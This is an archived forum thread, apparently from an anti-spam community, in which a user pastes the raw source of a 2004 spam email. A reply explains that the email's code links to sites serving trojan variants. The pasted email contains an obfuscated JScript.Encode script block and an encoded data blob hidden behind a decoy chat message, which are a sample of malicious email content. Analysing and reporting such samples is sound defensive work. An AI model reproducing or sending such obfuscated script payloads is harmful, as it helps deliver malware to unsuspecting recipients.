Jump to content

What does this email text mean?


AlphaCentauri

Recommended Posts

I received an email today with a spammy subject heading and encoded text. It resembles hexadecimal, but isn't when you really look at it (eg, strings like "C1C")

It seems too short to be a virus, but with the java scri_pt terms, it could be referring to executable code on a website somewhere. I have been receiving some infected emails from Kuwait lately (with more obvious virus base 64 code), so I figure the gibberish could be Arabic characters. So is it spam to report or a virus to not report?

X-POP3-Rcpt: me[at]mydomain.com

Received: from CPE0080c6fe2156-CM024430000310.cpe.net.cable.rogers.com (CPE0080c6fe2156-CM024430000310.cpe.net.cable.rogers.com [24.100.12.166])

by host2.capital-computers.com (8.12.10/8.12.10) with SMTP id i89NYjox011863;

Thu, 9 Sep 2004 19:34:56 -0400

Received: from .clickfish.com ([236.170.218.88]) by 24.100.12.166 with ESMTP;

Fri, 10 Sep 2004 00:26:32 +0100

Message-ID: <764996u210v8473b93l3697g6b3466[at]clickfish.com>

X-Mailer: Microsoft Office Outlook, Build 11.0.5510

Date: Thu, 09 Sep 2004 20:24:32 -0300

From: "Lucio Gipson" <Gamblethrb[at]clickfish.com>

Reply-To: "Lucio Gipson" <Gamblethrb[at]clickfish.com>

To: nonexistantperson[at]mydomain.com, me[at]mydomain.com,

info[at]mydomain.com, webmaster[at]mydomain.com

Subject: re:appointment thursday at 01-00 - Thu, 09 Sep 2004 19:27:32 -0400

Organization: Microsoft Office Outlook, Build 11.0.5510

Mime-Version: 1.0

Content-Type: multipart/alternative;

boundary="6-122353897-0350581327=:13108"

--6-122353897-0350581327=:13108

Content-Type: text/plain; charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable

--6-122353897-0350581327=:13108

Content-Type: text/html; charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

yo babe

what's up?

loved having fun with youm it was so funy. thailand is so great,

anyway, see you soon.

jeff

<scri_pt language=3D"JScript.Encode">#[at]~^ngAAAA=3D=3D~[at]#[at]&[Km!:+ YcADbYn`E[at]=

!(o"bHA~?"Z'r4OYa)Jz+!q 8 GR FFv&sbx3 4D:sJ, &fP_'Wc!,CA(M_KxcW!~o"bHA$r"=

f2"xTPUZ"rJS(HV'ExKEPkYzs=7F'J[rkwslHl WU=7Fir[at]*[at]!Jqw]bt2[at]*B*i[at]#[at]&iioAAA=3D=

=3D^#~[at]</scri_pt>

THIS IS AN AUTO-GENERATED MESSAGE - PLEASE DO NOT REPLY TO THIS MESSAGE<BR>Login Name: bzpwsun<BR>Password: hwacfby10589s<BR><BR>- Home directory: The location of the home directory varies by platform.<BR>Windows 98 (single-user): C:\Windows<BR>Windows 98 (multi-user): C:\Windows\Profiles<BR>Windows 2000/XP: C:\Documents and Settings<BR><BR><BR><BR><BR> -----BEGIN BLOCK-----<BR>F%D5%CDU%C2%058%E5%9A%D5%7D%85<BR>JJ%E3%DF%D7o%C1%1F%60%EA%F0%B2<BR>P%87s%22%F8%E1%96%29%CAd2%95%B<BR>%F8%97%2C%9Co%2F%85%FF%BD%3B%B<BR>D%5Cd%E8%FE%C2o%879C%F3%D0%C2%<BR>1D%98%28%22%BE%F0%B7%3C%DFBe%F<BR>8%90%C9%0B%D1%01i%E0%D3%AC6%8E<BR>%21%0B%BD%BE%CED%EDLm%A1%A7%E4<BR>3%92l%22%A9%91%90V%C2%0F0%AB%8<BR>C%9D%2F%98%01q%E9%D9%D0%09%CA%<BR>18%3D%D4%CC%CCh%A7a%5E%B7%9A%A<BR>E%13%C3%2FU%CE%FA%AE%7B%C1C%10<BR>%BA%E9%9AB%A9%18%1F%93%AB%FCm%<BR>A4Eg%D5%E7%B6w%E9%0D%0C%E5%F6%<BR>9Ad%F4v%10%F7%8E%9D%0D%EA%1Fs%<BR>99%E5%F1z%FEOP%DA%94%E05%D0uE%<BR>BB%DF%D7%0D%95%1D%27%82%8E%AA%<BR>04%8A5%3E%CC%D8%F4%11%E9%24d%B<BR>0%B7%AED%BB%7E%15%E3%C7%9C%22%

<DIV>Chauncey Michaud<BR>Sexton <BR>Advanced Bio-Medical Electronics, Inc., Slidell, 70458, United States of America<BR>========================================================================<BR> Pat H. Goad Warren County Circuit Clerk Warren County Justice Center Center Street- Suite Bowling Green KY Warren <BR>Phone: 197-144-7176 <BR>Mobile: 959-191-1385 <BR>Email: <A href="mailto:Delaneyvabeh[at]fiberia.com">Delaneyvabeh[at]fiberia.com</A><BR>========================================================================</DIV>

--6-122353897-0350581327=:13108--

Link to comment
Share on other sites

First of all, please provide the Tracking URL instead of posting the spam here directly.

Second, if you want to get involved with some folks tracking this stuff down, fire up your newsreader, set server to news://news.spamcop.net/spamcop.geeks .. look for threads with Subject lines containing Jscript Encode/Decode .... Basically, what they are saying is that the code in this spam points to one or more sites that have more code embedded in them. There has been some success in getting the ISP involved to kill the web-based URL/code stuff ... but then again, today's traffic seems to suggest that one site thought to be brought down has re-surfaced with different code .... and per one poster's query, my check appears to agree that he has been blocked from accessing that site .... so "we" may be dealing with a spammer / trojan writer that also reads the SpamCop newsgroups .....

For example, here's a snippet with an included Tracking URL so you can get a hint of the discussion ..... (and compare the spam content/structure)

> http://www.spamcop.net/sc?id=z650744697z56...aa34e54e60e818z

Interesting: same site as last one, 201.12.78.176. Oddly enough the site

has been armed again. Now with an 18 kb variant of ss.exe instead of the

15 kb variant found there previously. Also, the file link.html has been

repaired. Now it points to link.php at 201.12.78.176 instead of the

other location in bezeqint.net space.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...